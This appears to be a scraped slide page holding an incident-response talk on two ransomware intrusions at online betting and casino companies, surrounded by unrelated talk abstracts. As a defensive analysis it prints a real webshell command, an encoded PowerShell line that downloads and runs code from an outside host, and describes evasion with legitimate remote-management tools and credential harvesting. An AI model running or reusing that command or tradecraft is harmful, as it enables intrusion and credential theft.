This deck premiered at Black Hat in Las Vegas in August.
He explains two cases referring to the world of online gaming, in particular betting and online casinos.
These companies show two faces, on the one hand a great competence and attention to the quality of the code and the security of their portals, but they do not seem to be sensitive to the application of the same level of controls for what concerns their staff. As always the devil is in the details and the ransomware gangs know it well.
ModSecurity 3.0 and NGINX: Getting StartedNGINX, Inc.
On demand version can be accessed at https://www.nginx.com/resources/webinars/modsecurity-3-0-and-nginx-getting-started/
The long-awaited ModSecurity 3.0 is available now. ModSecurity 3.0 is a complete rewrite of ModSecurity, and is the first version to work natively with NGINX. ModSecurity 3.0 loads into NGINX as a dynamic module.
Watch this webinar to learn:
- A brief history of the ModSecurity project
- How ModSecurity stops Layer 7 attacks
- What’s changed with ModSecurity 3.0 and how it integrates with NGINX
- How to install and configure ModSecurity with both open source NGINX and NGINX Plus
ModSecurity 3.0 and NGINX: Getting StartedNGINX, Inc.
On demand version can be accessed at https://www.nginx.com/resources/webinars/modsecurity-3-0-and-nginx-getting-started/
The long-awaited ModSecurity 3.0 is available now. ModSecurity 3.0 is a complete rewrite of ModSecurity, and is the first version to work natively with NGINX. ModSecurity 3.0 loads into NGINX as a dynamic module.
Watch this webinar to learn:
- A brief history of the ModSecurity project
- How ModSecurity stops Layer 7 attacks
- What’s changed with ModSecurity 3.0 and how it integrates with NGINX
- How to install and configure ModSecurity with both open source NGINX and NGINX Plus
Slides for the presentation at Elastic {ON} Tour Tokyo 2017
https://www.elastic.co/elasticon/tour/2017/tokyo
Session Video: https://www.elastic.co/jp/elasticon/tour/2017/tokyo/microsoft
Slides for the presentation at Elastic {ON} Tour Tokyo 2017
https://www.elastic.co/elasticon/tour/2017/tokyo
Session Video: https://www.elastic.co/jp/elasticon/tour/2017/tokyo/microsoft
This presentation will introduce the Lockheed Martin Cyber Kill Chain and MITRE ATT&CK frameworks. By working through 4 different practical scenarios in a fictional company https://sensenet-library.com, the attendees will learn how they can use those frameworks to measure their security response in today's diverse security threat landscape. We'll go through categorising security controls, responding to a vulnerability report, assessing a threat intel report and decide on future of the company's toolset where you will be able to answer a question if you should continue investing in a tool or should you buy a new one.
Jon Noble. Jon will give a brief overview of why you should consider security as part of your CloudStack deployment, why your approach to security needs to be different than in a traditional environment, and also talk about some of the motives behind the attacks – why they attack you and what they do once they have compromised a system.
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where you have deployed a malware on a user’s workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.). On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user’s workstation.
I developed (and will publish) two tools that help you in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help you to circumvent the hardware firewall after we can execute code on the server with admin privileges (using a signed kernel driver). My tools are generic meaning that they work against Windows server 2012 and Windows 8, and they work with RDP or other remote desktops. The number of problems you can solve with them are endless, e.g., communicating with bind-shell on webserver behind restricted DMZ. Beware, live demo and fun included!
BSides London 2015 - Proprietary network protocols - risky business on the wire.Jakub Kałużny
When speed and latency counts, there is no place for standard HTTP/SSL stack and a wise head comes up with a proprietary network protocol. How to deal with embedded software or thick clients using protocols with no documentation at all? Binary TCP connections, unlike anything, impossible to be adapted by a well-known local proxy. Without disassembling the protocol, pentesting the server backend is very limited. However, when you dive inside this traffic and reverse-engineer the communication inside, you are there. Welcome to the world full of own cryptography, revertible hash algorithms and no access control at all.
We would like to present our approach and a short guideline how to reverse engineer proprietary protocols. To demonstrate, we will show you few case-studies, which in our opinion are a quintessence of ""security by obscurity"" - the most interesting examples from real-life financial industry software, which is a particularly risky business regarding security.
The security experts from Cloudflare and WP Engine help you navigate the security landscape for your web infrastructure.
Register to watch the on-demand webinar: https://hs.wpengine.com/webinar-securing-web-infrastructure
Shameful Secrets of Proprietary Network Protocols - OWASP AppSec EU 2014Jakub Kałużny
When it comes to penetration tests of specialized embedded software or thick clients, we often encounter proprietary protocols with no documentation at all. Binary TCP connections, unlike anything, impossible to be adapted by a well-known local proxy. Without disassembling the protocol, pentesting the server backend is very limited. Though, based on our experience, it very often hides a shameful secret - completely unsecured mechanisms breaking all secure coding practices.
CONFidence 2014: Jakub Kałużny: Shameful secrets of proprietary protocolsPROIDEA
There is a big bunch of tools offering HTTP/SSL traffic interception. However, when it comes to penetration tests of specialized embedded software or thick clients, we often encounter proprietary protocols with no documentation at all. Binary TCP connections, unlike anything, impossible to be adapted by a well-known local proxy. Without disassembling the protocol, pentesting the server backend is very limited. Though, based on our experience, it very often hides a shameful secret - completely unsecured mechanisms breaking all secure coding practices.
To demonstrate, we will show a few case-studies - most interesting examples from real-life industry software, which in our opinion are a quintessence of "security by obscurity". We will challenge the security of proprietary protocols in pull printing solutions, FOREX trading software, remote desktops and home automation technologies.
With "Patch Tuesday" Microsoft usually addresses various security vulnerabilities and issues by providing patches and updates for their software products. However, for malicious actors, Patch Tuesday can be a valuable resource for identifying new exploits.
In time, noticing this mechanism in the cybercriminal ecosystem, we decided to adopt a similar approach to support our Red Team and our investigations.
In a nutshell we industrialized a process where our Threat Intel team harvest exploits linked with the Patch Tuesday from the dark web, while our team reverse engineer the updates looking for code we can use during our Red team activities.
The result is an extended set of potential exploits we can reliably integrate in our arsenal when we carry out the simulated attacks.
This improves the effectiveness of our Test and allow us to extend the options we have against the defense mechanisms of our customers.
By using the newly acquired knowledge about the vulnerabilities, the Red Team can test whether these systems can detect or prevent exploitation attempts.
In our session, we will present our process and some examples where our newly acquired knowledge and exploit allowed our team to better test our Customers cybersecurity posture.
Light, Dark and... a Sunburst... dissection of a very sophisticated attack.Stefano Maccaglia
The deck covers details about the Sunburst/Solorigate breach including some interesting threat intel paths we are currently evaluating to attribute the attack.
Oh... that's ransomware and... look behind you a three-headed MonkeyStefano Maccaglia
A funny presentation me and Marco Faggian held for ISACA seminar in November 2020 related to our investigation of some Ransomware cases... stay tuned... oh... look behind you a three-headed monkey!...
UN session about modern ICT threat landscape.
The session was aimed to introduce recent threats targeting UN agencies and some potential recommendations to improve detection, investigation and understanding of these threats and their goals.
On August 2017 a well established Corporation was hit by an advanced attacker. The techniques adopted to overcome security platforms and infrastructures showed a very dangerous and innovative attacker. This is the tale of the IR team hired to fight this advanced attacker, a tale of a team pushing all his resources and technical skills to overcome the threat and finally chase the Adder...
DCC 2016 New strategies, old actors - APT and the evolution of Cybercrimina...Stefano Maccaglia
My presentation at DCC 2016 in Wien.
Abstract: With the integration of strategies and tools so far seen in APT attacks, cybercriminals have become much more dangerous for the financial world.
This evolution has improved the attack mechanisms,but also it has widened the attack range.
Thus, today, cybercriminals can breach, with the appropriate sophistication and patience, even structures and environments far from their reach, just few years ago, such as ATM networks.
This presentation, created by Syed Faiz ul Hassan, explores the profound influence of media on public perception and behavior. It delves into the evolution of media from oral traditions to modern digital and social media platforms. Key topics include the role of media in information propagation, socialization, crisis awareness, globalization, and education. The presentation also examines media influence through agenda setting, propaganda, and manipulative techniques used by advertisers and marketers. Furthermore, it highlights the impact of surveillance enabled by media technologies on personal behavior and preferences. Through this comprehensive overview, the presentation aims to shed light on how media shapes collective consciousness and public opinion.
Collapsing Narratives: Exploring Non-Linearity • a micro report by Rosie WellsRosie Wells
Insight: In a landscape where traditional narrative structures are giving way to fragmented and non-linear forms of storytelling, there lies immense potential for creativity and exploration.
'Collapsing Narratives: Exploring Non-Linearity' is a micro report from Rosie Wells.
Rosie Wells is an Arts & Cultural Strategist uniquely positioned at the intersection of grassroots and mainstream storytelling.
Their work is focused on developing meaningful and lasting connections that can drive social change.
Please download this presentation to enjoy the hyperlinks!
2. Who I Am: Stefano
• I am the Practice Manager of the Netwitness (RSA)
Incident Response.
• I began my ICT career in 1997 in Digital Corp, but I
started to crack software in 1985 with a Commodore
C64.
• I decided to get out of the cracking scene in 2000 to
focus on networking… until Nimda and Blaster came
out and cybersecurity became an interesting
career…
• I worked on the offensive side until 2009 when I
jumped into the IR bandwagon.
• Since then, I lead engagements around the world
covering investigation about sophisticated actors.
3. Agenda
❑ Introduction
❑ The first case
❑ Initial Compromise
❑ Second Phase, Second Actor
❑ Third Phase
❑ Ransomware in play
❑ The outcome
❑ The second case
❑ Exotic Lily + Conti…
❑ Enablers of compromise
❑ Lesson learned
5. Initial Compromise
▪ Through an active exploit of the Exchange Web Server, two webshells were uploaded to DC1-
EXCH01 on December 9, 2021.
DC1-EXCH00
DC1-EXCH01
MUNICH
Data Center
23.183.81.113
Logout.aspx
iisstart.aspx
The Exchange server
version was 2019 CU10
6. Evidence of Initial Attack
▪ The proximity in the file creation (a few milliseconds apart) in different paths, confirm the
webshells were dropped through an exploit with chained payloads.
▪ Web logs retention on the server was 30 days, so the logs rolled out before the investigation
started, but the webshells were likely uploaded via the exploit CVE-2021-42321, an RCE, based
on the folders used to drop them.
First Webshell
Basic loader
Second Webshell with
functions to interact with files
Timestomped dates
7. CVE-2021-42321 in action
▪ The remote code execution vulnerability is due to issues with the validation of command-let
(cmdlet) arguments.
▪ In order to exploit this flaw, an attacker would
need to be authenticated.
The attack requires
execution of 4 POSTs
in a chain against
Exchange with an
authenticated user to
be successful.
8. We never leaked credentials…
▪ The attacker authenticated by leveraging on leaked credentials of a subcontractor working as
developer in the environment.
Yeah that account is
mine, but it is a personal
account… what it’s the
meaning of this?... And
how you collect it???
9. Logout.aspx Webshell
▪ This webshell is extremely simple, it call the IIS Worker process (w3wp.exe) to spawn the
Command Processor, which, in turn, launches PowerShell (powershell.exe or pwsh.exe).
"cmd.exe" /c powershell -ep bypass -e
SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLmRvd25sb2Fkc3
RyaW5nKCdodHRwOi8vd3d3Lmt1bmlwdGlraWt5LmluZm8vcD9lJyk=
IEX (New-Object Net.WebClient).downloadstring('http://www.kuniptikiky.info/p?e')
DECODED
10. Webshell Logic of iisstarts.aspx
▪ The second webshell allows the attacker to interact with the system through requests containing
the parameter cadataKey.
▪ If the cadataKey parameter is not specified, the web shell performs a redirection to the
errorFE.aspx page, returning a HTTP 404 code.
• The web shell included the ability to run arbitrary commands and upload, delete, and view the
contents of files.
• Once implanted, the webshell was allowing the attacker to access the environment with local
administration rights.
All commands specified through
this parameter are executed
through an eval statement.
12. Second Phase, Second Actor
▪ On February 18, 2022, the attacker uploaded a file named lsass.dll to the DC1-EXCH00 and
few minutes later to DC1-EXCH01.
▪ This malicious file is loaded into processes and harvests clear text passwords in real time as
various users authenticate with the Exchange server.
DC1-EXCH00
DC1-EXCH01
MUNICH
Data Center
23.183.81.113
iisstart.aspx
lsass.dll
iisstart.aspx
This long pause between the initial webshells and the
subsequent activity could be due to the initial attacker
selling access to the Ransomware attacker.
13. Second Phase, Second Actor
▪ The harvested credentials are saved into a file named:
▪ Hundreds of clear text credentials passwords were harvested.
▪ This file was subsequently uploaded to several other servers, including several domain
controllers.
DC1-EXCH00
DC1-EXCH01
MUNICH
Data Center
iisstart.aspx
lsass.dll
iisstart.aspx
C:windowstemptmpQWER.tmp
User
Pass
C:windowstemptmpQWER.tmp.
User
Pass
The DLL uses the NPLogonNotify API provided by Microsoft to
extract cleartext credentials of users as they log into the servers
14. Second Phase, Second Actor
▪ The attacker also uploaded the first instance of the ATERA agent and Splashtop (a Remote
Desktop software) on DC1-EXCH00 on 18 February 2022.
DC1-EXCH00
DC1-EXCH01
MUNICH
Data Center
23.183.81.113
iisstart.aspx
atera.exe
iisstart.aspx
Atera is an IT management solution
that enables monitoring,
management, and automation of IT
networks from a single console.
lsass.dll
15. How to Avoid Generic Detection: Atera
▪ The idea behind this tactic is to leverage a legitimate remote management agents (like Atera)
to survive possible Cobalt Strike detections from the EDR and Antivirus platforms.
▪ Relying upon a legitimate tool to achieve persistence is typically a Pen Tester approach and in
my personal perspective this can clarify the attacker background.
16. atera.exe
How to Complete the Job…
▪ The attacker then resumed activity on 11 March 2022.
DC1-EXCH00
DC1-DC0001
MUNICH
Data Center
23.183.81.113
Webshell
lsass.dll
atera.exe lsass.dll
The Atera package was uploaded on the Domain Controller
of the targeted Data Center (DC1-DC0001) together with the
credential dumper “lsass.exe”.
17. How to Complete the Job…
▪ On March 23, the attacker uploaded lsass.dll to the DC1-EXCH01:
DC1-EXCH00
DC1-EXCH01
MUNICH
Data Center
23.183.81.113
iisstart.aspx
lsass.dll
iisstart.aspx
He immediately started the credential harvesting on
this system.
18. Third Phase: 23 March – 5 April
▪ During this period attacker moved laterally to various systems, including Domain Controllers,
Backup servers, etc.
▪ Scanning and reconnaissance on the network were executed regularly.
DC1-DC0001
DC1-EXCH00
lsass.dll
lsass.dll
iisstart.aspx
atera.exe
During these scanning the attacker
identified the virtual infrastructure where
critical servers were operating.
Scanning
Workstations
Dev Systems
Virtual Infrastructure
MUNICH
Data Center
MUNICH
Office
20. Status
▪ Ok, we reached this point… it’s April 6, the attacker owns the place and in less
than 24 hours he collected about 12,45 Gb of data from the environment
including lots of payment and betting details.
▪ Unfortunately, up to this point, the attacker was able to work undetected. Why?
▪ To answer we should clarify the meaning and the role of an “Enabler of
Compromise,” but let’s see how the attack unfolded...
22. RDP + PSExec
Ransomware distribution
Ransomware in Play…
6 April 2022
The attacker executed a massive dissemination of
the ransomware executable with a combination of
RDPs and PsExec sessions.
DC1-DC0001
lsass.dll
atera.exe
Workstations
Dev Systems
Virtual Infrastructure
MUNICH
Data Center
MUNICH
Office
TORONTO
Data Center
MACAU
Data Center
23. Ransomware in Play…
▪ With a separated and tailored action, the attacker ensured the backup servers of the
company were encrypted, by leveraging another variant of the ransomware.
▪ This variant was also used against the company ESXi servers (about 50 hosts), which
adversely affected around 2000 virtual machines hosted in them.
▪ The ransomware file that the attacker deployed to the ESXi servers was named “32app”.
▪ The version affecting all the other hosts was named “bet9je_com_alpha_encrypt_app.exe”.
24. Virtual Server Encryption
▪ The attacker appears to have infected the ESXi servers manually via SSH connections to them.
DC1-DC0001
Virtual Infrastructure
MUNICH
Data Center
atera.exe
Ransomware
Distribution via
SSH Sessions
Backup Infrastructure
Ransomware
installed manually
25. What we found: Network Forensics
▪ During the attack, the actor kept three systems untouched, in particular the Exchange server.
atera.exe
DC1-EXCH00
MUNICH
Data Center
TORONTO
Data Center
DC1-EXCH10
DC3-SPORS2
▪ This is due probably to the goal of keeping an eye upon the
target.
▪ In fact, the victim email system was still working despite the
encryption of the remaining systems…
26. The Outcome
▪ It took 45 days to get rid of the whole infection, but it took five days to recover basic services
allowing the company to slowly get back to business.
▪ From the end-users perspective the attack was a significant blow to the company’s reputation
and, at least initially, it impacted on the overall relationship with the company’s customer base.
▪ However, the gaming world has its own rules and 45 days later, it was like business as normal
in the company headquarters… apart for some minor, but meaningful details:
▪ Enhanced network visibility
▪ New staff for daily monitoring of network and infrastructures…
▪ No Splashtop, Teamviewer or Anydesk connections
▪ No scripts with hardcoded credentials
▪ New cybersecurity procedures
28. The second case: introduction
▪ This case targeted a group operating on the online casino sector with about 2.500 employees.
▪ The company has two data centers located in Australia and Hong Kong and operates mainly in the
Asian-Pacific market.
▪ The cybersecurity practice inside the Company at the time was mainly managed by one global MSSP
and one local provider.
▪ Again, privacy is a mandatory requirement for an online casino and the company was applying strong
controls upon online services and data privacy.
▪ However, they left open several holes in their cybersecurity ecosystem…
Total lack of Network
visibility both internally
and in the Company
Private Cloud
Lack of organized logs
and limited endpoint
visibility
Lack of any behavior
analysis at user level
for internal staff
Limited investigative
and reactive
capabilities
Real-time Threat
detection limited to
“low hanging fruits”.
Lots of enablers of compromise…
Lack of proper
escalation plan for ICT
incidents
29. Attack Preparation
▪ The attack was organized around a flow very similar to the first case presented, with the
difference that the attacker this time targeted the staff with domain spoofing and spear-phishing.
Upload payload sharing it
with target
Send a file sharing
notification
Register “company.us” to
spoof “company.co.au”
Create
employee@company.us
email account
Acquire target’s email
through OSINT and send a
phishing email
Send a sounding email
discussing business and
meetings
Online File-sharing
Service Victim
Attacker
30. Initial Compromise
▪ The attacker sent an email mimicking a contractor and asking for feedback on a service
architecture.
▪ The email was asking to set a time for a call the following week about the content of the email.
MUNICH
Data Center
44.227.65.245
Attacker
31. BazarLoader
Exotic Lily + Conti in Action
Domain Spoofing
Spear-Phishing Campaign
Initial Compromise and Recon
Cobalt Strike
write,
execute
Exotic Lily
Download additional tools
Perform command-line recon
Harvest local and network credentials
Lateral Movement
Powershell
RDP: Splashtop, Anydesk
Stolen VPN and Admin Credentials
CONTI
RDP toward DCs
Atera Package
Application Servers
Exotic Lily C2
Leaks
SSL Sessions to C2
32. No Doubt on Attribution…
It was absolutely easy to attribute the attack to the Conti Ransomware
Gang, their banner was speaking for themselves:
34. Enablers of Compromise
▪ An enabler of compromise is an exploitable condition that could lead to a faster or wider
expansion of the radius and the magnitude of the attack.
▪ Typical enablers of compromise are legacy protocols, such as SMBv1, Telnet, TFTP, etc…
These protocols, if exploited, could grant significant advantages to the attacker.
▪ Other traditional enablers are shared local administrative accounts, guessable credentials,
unpatched public web servers or unauthenticated network shares.
▪ Nowadays, during targeted attacks, the attacker could use a myriad of tools and techniques
to breach an organization’s network, steal sensitive information and compromise its
operations.
▪ Vulnerable endpoints, legacy protocols and careless users represent three enablers to
successful cyber attacks.
An enabler of compromise is a pre-existing condition to the attack.
35. Script with Hardcoded Credentials
We found cron script /root/inventory_queries.sh on a critical repository containing login credentials
hardcoded, as illustrated here:
Also, we found cron jobs running under the root user that had a service account, including the password,
in cleartext.
36. Enablers of compromise or careless users???
Unreported Teamviewer and Anydesk usage.
During the analysis we found several systems connected to the company network with
TeamViewer and Anydesk remote control software installed.
The presence of remote control software in systems connected to the network may provide
additional access points that bypass existing security measures
Cracked software
During the analysis we found evidence of systems using cracked Windows licenses.
Powershell scripts with cleartext credentials
Reviewing the network, we found several PowerShell scripts containing cleartext credentials.
Root password in root’s .bash_history
Reviewing the logs regarding the usage of Unix systems we stumbled upon another significant
Enabler of Compromise…
You can notice here…
38. C O N F I D E N T I A L
It’s all about visibility… and a clean environment…
▪ The sophisticated nature of today’s threat landscape and actors continue to wreak havoc on
enterprise infrastructures, to our surprise, this occurs upon betting and online casino services
more than expected.
▪ Visibility is the key to protecting a network by actively looking for any security gap, vulnerability,
on-going cyber attack, and any anomaly or wrong usage of network resources.
▪ The rule is “If you don’t find them, you can’t fix them”.
▪ Unfortunately, visibility is a major issue in the gaming industry.
▪ There could be several reasons why this is the case – the gaming industry may not understand
the importance of network visibility, for example, or lack the tools and resources to get started.
▪ In any case, the lack of adequate response from security teams is due to the dependency on
parameter-based security solutions that are not agile enough to deal with sophisticated threats
or is due to the limited spectrum of cybersecurity controls these companies enforce nowadays.
39. Visibility, Flexibility and Practice
Comprehensive Visibility Preparedness
Incident
Response
Retainer
Major Incident
Practice Drills
Cyber Insurance
Recovery
Planning
Preparedness
Proactive Detection
and Response
Reactive Capabilities